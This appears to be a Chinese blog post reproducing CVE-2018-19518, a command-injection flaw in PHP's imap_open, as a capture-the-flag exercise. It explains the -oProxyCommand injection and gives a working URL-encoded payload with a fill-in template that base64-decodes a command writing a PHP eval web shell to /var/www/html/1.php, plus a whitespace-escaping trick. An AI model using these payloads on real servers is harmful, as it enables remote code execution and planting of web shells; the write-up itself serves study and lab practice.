当前位置：首页 > news >正文

CVE-2018-19518 漏洞复现

news 2025/7/8 5:27:33

CVE-2018-19518

漏洞介绍

IMAP协议（因特网消息访问协议）它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息，下载邮件等。它运行在TCP/IP协议之上，使用的端口是143。在php中调用的是imap_open函数。

PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接，则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的exec 受影响软件中的功能，攻击者可利用这些功能在目标系统上执行任意shell命令。利用此漏洞的功能代码是Metasploit Framework的一部分。

imap_open(string $mailbox,string $user,string $password)

其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而，debian/ubuntu中默认使用ssh来代替rsh，如下图：

又因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令，所以攻击者通过注入这个参数，最终将导致命令执行漏洞。

ssh -oProxyCommand ="tac /flag|tee /tmp/executed"localhost
#其中管道符tee意思是将内容追加到文件并且在屏幕输出

可以看到尽管没有连接成功，但是我们成功的把命令写入到了文件，所以这也就是我们系统被攻击的成因。

ProxyCommand，连接服务器的这样的一个命令具体说明如下：

ProxyCommand 指定用于连接服务器的命令。命令字符串扩展到行的末尾，并使用用户的shell’ exec’指令执行，以避免延迟的shell进程。 ProxyCommand接受TOKENS 部分中描述的令牌的参数。该命令基本上可以是任何东西，并且应该从其标准输入读取并写入其标准输出。它应该最终连接在某台机器上运行的sshd服务器，或者在sshd -i某处执行。主机密钥管理将使用所连接主机的HostName完成（默认为用户键入的名称）。设置命令以none完全禁用此选项。请注意， CheckHostIP无法与代理命令连接。该指令与nc及其代理支持结合使用非常有用。例如，以下指令将通过192.0.2.0的HTTP代理连接： ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

解析命令时还会有问题。要绕过斜杠和空格的转义。用$IFS和\t或者base64编码和相关命令再解码。如下：

echo "echo hello|tee /tmp/executed"|base64ehco ZWNobyBoZWxsb3x0ZWUgL3RtcC9leGVjdXRlZAo=|base64 -d|bash

影响版本

Ubuntu、Debian、Red Hat、SUSE

PHP 5.6.x < 5.6.39

开始做题。初始界面是邮箱登录，有三个参数可以输入，分别是邮箱、账号、密码。是CVE-2018-19518的特征。

看看network，版本条件都满足。

抓个包看看，三个参数是hostname、username、password，猜测后端PHP语言用了imap_open(string $mailbox,string $user,string $password)语句。满足条件。

直接固定payload打：

# 原始payload
x+-oProxyCommand=echo	echo '<?php eval($_POST[1]);' > /var/www/html/1.php|base64	-d|sh}# base64+url编码以后
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}# 模板
hostname=x+-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}&username=xxx&password=xxx

最终payload：

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}&username=xxx&password=xxx

访问/1.php，直接getshell。

CVE-2018-19518 漏洞复现

CVE-2018-19518

相关文章：

CVE-2018-19518 漏洞复现

Python爬虫实战：抓取猫眼电影排行榜top100#4

Fiddler抓包工具之fiddler界面工具栏介绍

LabVIEW工业监控系统

Linux 文件连接：符号链接与硬链接

数据分类分级

第三十天| 51. N皇后

pythn-scipy 查漏补缺

【JavaScript 漫游】【013】Date 对象知识点摘录

vue.config.js和webpack.config.js区别

H12-821_73

postman执行批量测试

蓝桥杯基础知识8 list

【DDD】学习笔记-理解领域模型

v-if 和v-show 的区别

LabVIEW网络测控系统

攻防世界 CTF Web方向引导模式-难度1 —— 11-20题 wp精讲

华为Eth-Trunk级联堆叠接入IPTV网络部署案例

idea: 无法创建Java Class文件（SpringBoot）已解决

ChinaXiv：中科院科技论文预发布平台

智慧工地云平台源码，基于微服务架构+Java+Spring Cloud +UniApp +MySql

【入坑系列】TiDB 强制索引在不同库下不生效问题

UDP(Echoserver)

postgresql|数据库|只读用户的创建和删除（备忘）

Java-41 深入浅出 Spring - 声明式事务的支持事务配置 XML模式 XML+注解模式

【Go】3、Go语言进阶与依赖管理

【配置 YOLOX 用于按目录分类的图片数据集】

PL0语法，分析器实现！

三体问题详解

JUC笔记(上)-复习涉及死锁 volatile synchronized CAS 原子操作